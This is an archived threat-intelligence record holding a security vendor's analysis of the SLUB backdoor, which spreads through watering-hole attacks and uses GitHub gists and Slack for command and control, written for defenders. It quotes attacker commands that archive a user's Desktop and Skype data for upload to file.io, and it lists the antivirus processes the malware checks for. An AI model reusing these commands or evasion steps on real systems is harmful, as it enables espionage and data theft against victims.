{ "id": "c4120f7c-4771-4202-bbc5-1aa1e6c12a4d", "created_at": "2026-04-06T00:17:15.406549Z", "updated_at": "2026-04-10T03:23:51.100224Z", "deleted_at": null, "sha1_hash": "9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8", "title": "New SLUB Backdoor Uses GitHub, Communicates via Slack", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 86432, "plain_text": "New SLUB Backdoor Uses GitHub, Communicates via Slack\r\nPublished: 2019-03-07 · Archived: 2026-04-05 13:00:01 UTC\r\nWe recently came across a previously unknown malware that piqued our interest in multiple ways. For starters, we\r\ndiscovered it being spread via watering hole attacks, a technique that involves an attacker compromising a website\r\nbefore adding code to it so visitors are redirected to the infecting code. In this case, each visitor is redirected only\r\nonce. The infection was done by exploiting CVE-2018-8174, a VBScript engine vulnerability that was patched by\r\nMicrosoft back in May 2018.\r\nSecond, it uses a multi-stage infection scheme. After it exploits the vulnerability, it downloads a DLL and runs it\r\nin PowerShell (PS). This file, which is a downloader, then downloads and runs the second executable file\r\ncontaining a backdoor. The first stage downloader also checks for the existence of different kinds of antivirus\r\nsoftware processes, and then proceeds to exit if any is found. At the time of discovery, the backdoor was\r\nseemingly unknown to AV products.\r\nIn addition to the previously mentioned facts, we quickly noticed that the malware was connecting to the Slack\r\nplatform, a collaborative messaging system that lets users create and use their own workspaces through the use of\r\nchannels, similar to the IRC chatting system. We found this quite interesting, since we haven’t observed any\r\nmalware to date that communicates using Slack-- although we've previously discussed how cybercriminals could\r\npossibly abuse chat platforms as part of their attack.\r\nOur technical investigation and analysis of the attacker’s tools, techniques, and procedures (TTP) lead us to think\r\nthat this threat is actually a stealthy targeted attack run by capable actors, and not a typical cybercriminal scheme.\r\nNote that as soon as this malware was discovered, we informed the Canadian Centre for Cyber Security, which\r\nacts as Canada’s National Computer Security Incident Response Team (CSIRT). The Cyber Centre alerted the site\r\noperator, helped them understand the malware that was found, and offered mitigation advice.\r\nInfection Chain  \r\nintel\r\nFigure 1. The infection chain of the attack\r\nThe downloader\r\nThe downloader, which runs through PowerShell as a DLL, serves several purposes. The first is to download the\r\nsecond stage malware, which we called the SLUB (for SLack and githUB; detected as\r\nBackdoor.Win32.SLUB.A) backdoor and execute it. The second purpose is to check if the following antivirus\r\nprocesses are running:\r\nV3Tray.exe\r\nAYAgent.aye\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nPage 1 of 6\n\nnavapsvc.exe\r\nashServ.exe\r\navgemc.exe\r\nbdagent.exe\r\nZhuDongFangYu.exe\r\n \r\nIf the downloader finds one of these, it simply exits.\r\nFinally, the downloader also exploits the CVE-2015-1701 vulnerability to acquire Local Privilege Escalation. The\r\nexploit's code was likely created by modifying code from a GitHub repository, which is shown in the image below.\r\nintel\r\nFigure 2. The unmodified code\r\nThe SLUB backdoor\r\nThe SLUB backdoor is a custom one written in the C++ programming language, statically linking curl library to\r\nperform multiple HTTP requests. Other statically-linked libraries are boost (for extracting commands from gist\r\nsnippets) and JsonCpp (for parsing slack channel communication).\r\nThe malware also embeds two authorization tokens to communicate with the Slack API.\r\nIt copies itself to ProgramData\\update\\ and creates persistence via a Run registry key, calling export\r\nfunction UpdateMPUnits with rundll32.exe. Note the typo in the ValueName, “Microsoft Setup\r\nInitializazion.”\r\nintel\r\nFigure 3. Screenshots of the Run registry key\r\nIt downloads a specific “gist” snippet from Github and parses it, looking for commands (which we will\r\ncover further in this entry) to execute. Only lines starting with “^” and ending with “$” will be executed.\r\nThe other lines are ignored.\r\nintel\r\nFigure 4. The “gist” snippet that is downloaded from Github\r\nThe result of the commands is then posted to a private Slack channel in a particular workspace using the\r\nembedded tokens.\r\nNote that a side effect of this particular setup is that the attacker has no way to issue commands to a specific\r\ntarget. Each infected computer will execute the commands that are enabled in the gist snippet upon checking it.\r\nintel\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nPage 2 of 6\n\nFigure 5. Scheme of the backdoor communication, with the first arrow starting from the person who initiates the\r\nconnection\r\nBackdoor features\r\nThe backdoor supports the following commands and subcommands (most of them are self-explanatory).\r\nCommands and subcommands / parameters are separated with a comma “,”, as seen in figure 4.\r\nCommand\r\nLine\r\nDetails\r\nexec Execute command with cmd.exe\r\ndnexec Download and execute command\r\nupdate Download a file, remove the current one and run the downloaded file\r\ndestroy Delete malware from disk with a batch script\r\ncapture Take screenshot and send it to slack channel\r\nfile  \r\nlist List specified file\r\ncopy Copy specified file\r\ndelete Delete specified file\r\nupload Upload local file to file.io website and post the download link to the Slack channel\r\ndir  \r\ncreate Create directory\r\nremove Remove directory\r\nproc  \r\nlist List processes\r\nkill Terminate process\r\ndrive  \r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nPage 3 of 6\n\nlist\r\nGet information about each volume of the current drive, such as free space, extended\r\nattributes, USN journal activation, and encryption state\r\nreg  \r\nQuery Query registry key\r\nRead Read registry key\r\nWrite Write registry key\r\ntmout Call to “sleep” function\r\nSlack communication function\r\nThe slack communication function contains two hardcoded authentication tokens split into a few smaller chunks.\r\nintel\r\nFigure 6. Code of the communication function\r\nLater, the backdoor gets the username and computer name (seen in Figure 7) then creates and uploads the Slack\r\nmessage into a channel. It uses the following API to post messages:\r\nhttps://api.slack.com/methods/chat.postMessage\r\n \r\nintel\r\nFigure 7. Retrieving the username and computer name\r\nThe keywords “title,” “text,” “channel,” and “attachments” are clearly visible in the function listing.\r\nintel\r\nFigure 8. Function listing showing keywords\r\nThe output of every command is sent to a private Slack channel, while every command itself is sent to a different\r\nprivate Slack channel as an attachment with the text “*computername:username*”.\r\nThe attacker’s tools, techniques and procedures\r\nThe Github account and the Slack workspace were created specifically for a campaign on February 19 and 20,\r\nwhile we estimate that the attacker compiled the malware on February 22. The attacker added the first commands\r\nto Github on February 20. However looking at the Slack channels, we can see that the attacker tested the malware\r\non February 23 and 24. The first victims were seen on February 27. The attackers' first actions involve getting\r\ncontext information to learn more about the computer they infected:\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nPage 4 of 6\n\n^exec,tasklist$ ^capture$ ^drive,list$ ^file,list,C:\\Users\\$\r\n^reg,read,HKEY_CURRENT_USER,SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run$\r\nThey look for running processes, take screen captures, list drives on the machine, list all users, and check the\r\nmalware's persistence registry key. They will also usually list some known directories:\r\n^exec,dir /s C:\\Users\\USER\\Desktop\\$\\ ^exec,dir /s C:\\Users\\USER\\Downloads\\$\\ ^exec,dir /s\r\nC:\\Users\\USER\\Recent\\$\r\nSome commands caught our interest, such as one that allows the attacker to create an archive file of the user's\r\nentire Desktop folder, which is then exfiltrated:\r\n^exec,powershell -Command compress-archive -path C:\\Users\\USER\\Desktop -destinationpath\r\nC:\\Users\\USER\\doc1$\\ ^file,upload,C:\\Users\\USER\\doc1$\r\nThe following command allows an attacker to build a CAB file containing the file tree of the user’s Desktop:\r\n^exec,cd C:\\Users\\USER \u0026 dir /s /b /a-d C:\\Users\\USER\\Desktop \u003e C:\\Users\\USER\\win12 \u0026 makecab\r\n/d CabinetName1=win34 /f C:\\Users\\USER\\win12$\r\nThe attacker is also seemingly interested in files containing the local archive in Skype:\r\n^file,upload C:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage-ecs.data$ ^file,upload\r\nC:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data$ ^file,upload\r\nC:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data-shm$ ^file,upload\r\nC:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data-wal$\r\nThe attacker copies all the HWP files (extension used by a Korean word processor) to a specific directory.\r\n^exec,copy C:\\Users\\USER\\Desktop\\*.hwp C:\\Users\\USER\\oo$\r\nThe attacker likely planned to exfiltrate this directory — however, we did not see any commands for this. We also\r\nnoted a specific interest in a software called “Neologic Plus Board,” which seems to be used for the administration\r\nof bulletin board systems. Some of the files that the attackers retrieved contained hundreds of BBS URLs.\r\nWe also noticed that most of the files uploaded to file.io were already deleted when we tried to retrieve them.\r\nBased on the commands run by the attackers, we theorize that they are looking for people-related information. The\r\nattackers want to know more about the targeted victims’ communications. Thus, they dig into activities on Twitter,\r\nSkype, KakaoTalk, BBS — and possibly more communication systems — in addition to collecting the HWP files.\r\nThis timeline of events shows the speed in which the threat actors launched the attack:\r\nintel\r\nFigure 9. Timeline of events\r\nConclusion\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nPage 5 of 6\n\nPerhaps the most unique aspect of this campaign is that it makes use of three different online services to issue\r\ncommands, get the results, and retrieve files from compromised hosts.\r\nOur investigation makes us believe with strong confidence that it was part of a possible targeted attack campaign.\r\nSo far, we have not been able to find related attacks, and have not spotted the custom backdoor elsewhere. We\r\nhave been searching for similar samples and have found none so far, which is a strong indication that the attackers\r\neither developed the malware or got it from a private developer who has not publicly leaked it.\r\nThe commands that the attackers ran clearly show a strong interest in person-related information, with a special\r\nfocus on communication software, in an attempt to learn more about the people behind the computers they\r\ninfected.\r\nThe attackers also appear to be professionals, based on their way of handling their attack. They only use public\r\nthird party services, and therefore did not need to register any domains or anything else that could leave a trail.\r\nThe few email addresses we found during the investigation were also using trash email systems, giving the\r\nattackers a clean footprint. Finally, the watering hole chosen by the attackers can be considered interesting for\r\nthose who follow political activities, which might give a glimpse into the nature of the groups and individuals that\r\nthe attackers are targeting.\r\nWe would like to thank Github’s SIRT and Slack’s security teams for quickly removing the related files, which\r\neffectively cut the communication between the attackers and their malware.\r\nIn response to this incident, Slack replied with the following: As noted in their post, Trend Micro recently\r\ndiscovered a third party’s unauthorized access of another third party’s computer using malware, and reported to\r\nus the existence of a Workspace on Slack related to this effort. We investigated and immediately shut down the\r\nsingle Workspace as a violation of our terms of service, and we confirmed that Slack was not compromised in any\r\nway as part of this incident. We are committed to preventing the misuse of our platform and we will take action\r\nagainst anyone who violates our terms of service.\r\nIndicators of Compromise (IoCs):\r\n3ba00114d0ae766cf77edcdcc953ec6ee7527181968c02d4ffc36b9f89c4ebc7\r\n(Trojan.Win32.CVE20151701.E)\r\n43221eb160733ea694b4fdda70e7eab4a86d59c5f9749fd2f9b71783e5da6dd7 (Backdoor.Win32.SLUB.A)\r\nURLs:\r\nhxxps://gist.github[.]com/kancc14522/626a3a68a2cc2a91c1ece1eed7610c8a\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/" ], "report_names": [ "new-slub-backdoor-uses-github-communicates-via-slack" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434635, "ts_updated_at": 1775791431, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8.pdf", "text": "https://archive.orkl.eu/9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8.txt", "img": "https://archive.orkl.eu/9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8.jpg" } }